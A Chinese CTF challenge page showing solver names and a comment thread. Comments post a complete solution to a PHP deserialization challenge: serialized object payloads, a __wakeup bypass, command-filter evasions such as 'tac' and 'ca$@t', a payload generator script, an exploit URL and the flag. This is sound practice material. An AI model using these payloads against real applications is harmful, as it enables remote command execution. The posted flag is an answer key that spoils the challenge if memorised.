评分(3)
解题动态
Subufan 攻破了该题 8小时前
blueboat 攻破了该题 3天前
soha 攻破了该题 4天前
hjm123 攻破了该题 5天前
SDLbyZ 攻破了该题 8天前
5883120xly 攻破了该题 10天前
ucole 攻破了该题 14天前
17807032991 攻破了该题 16天前
DZcoming 攻破了该题 17天前
xjuqq 攻破了该题 18天前
ctf88 攻破了该题 22天前
flag与她皆失 攻破了该题 24天前
xiaobai19860830 攻破了该题 26天前
zy07020304 攻破了该题 26天前
凑友希那 攻破了该题 29天前
lplum 攻破了该题 29天前
fanthan 攻破了该题 1月前
秋天在哪 攻破了该题 1月前
Future92 攻破了该题 1月前
评论
18956160518 1年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 1年前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 2年前
举报
nl flag.php|base64
不会编程的崽 2年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 2年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 2年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 2年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 2年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 2年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 2年前
举报
特别要注意下url编码的问题